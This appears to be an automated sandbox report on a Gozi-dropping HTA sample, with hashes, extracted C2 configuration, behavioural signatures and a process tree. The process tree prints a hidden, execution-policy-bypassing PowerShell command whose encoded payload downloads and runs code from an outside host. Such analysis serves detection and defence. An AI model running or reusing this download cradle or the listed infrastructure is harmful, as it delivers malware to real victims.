Analysis
-
max time kernel
149s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
07-10-2023 01:35
Static task
static1
Behavioral task
behavioral1
Sample
4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta
Resource
win7-20230831-en
General
-
Target
4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta
-
Size
22KB
-
MD5
57d3eb665f1e9e6a19f278baabd49e7b
-
SHA1
44566a9d716e6abd0304544dd88d245fea990882
-
SHA256
4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
-
SHA512
30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d
-
SSDEEP
384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF
Malware Config
Extracted
http://communicalink.com/index.php
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1320 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
VzfbnMZ.exepid process 2724 VzfbnMZ.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 1320 powershell.exe 1320 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1320 powershell.exe 1320 powershell.exe 1320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1320 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
mshta.execmd.exepowershell.exedescription pid process target process PID 2440 wrote to memory of 2596 2440 mshta.exe cmd.exe PID 2440 wrote to memory of 2596 2440 mshta.exe cmd.exe PID 2440 wrote to memory of 2596 2440 mshta.exe cmd.exe PID 2440 wrote to memory of 2596 2440 mshta.exe cmd.exe PID 2596 wrote to memory of 1320 2596 cmd.exe powershell.exe PID 2596 wrote to memory of 1320 2596 cmd.exe powershell.exe PID 2596 wrote to memory of 1320 2596 cmd.exe powershell.exe PID 2596 wrote to memory of 1320 2596 cmd.exe powershell.exe PID 1320 wrote to memory of 2724 1320 powershell.exe VzfbnMZ.exe PID 1320 wrote to memory of 2724 1320 powershell.exe VzfbnMZ.exe PID 1320 wrote to memory of 2724 1320 powershell.exe VzfbnMZ.exe PID 1320 wrote to memory of 2724 1320 powershell.exe VzfbnMZ.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Users\Admin\AppData\Local\Temp\VzfbnMZ.exe"C:\Users\Admin\AppData\Local\Temp\VzfbnMZ.exe"4⤵
- Executes dropped EXE
PID:2724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
Filesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
Filesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
Filesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512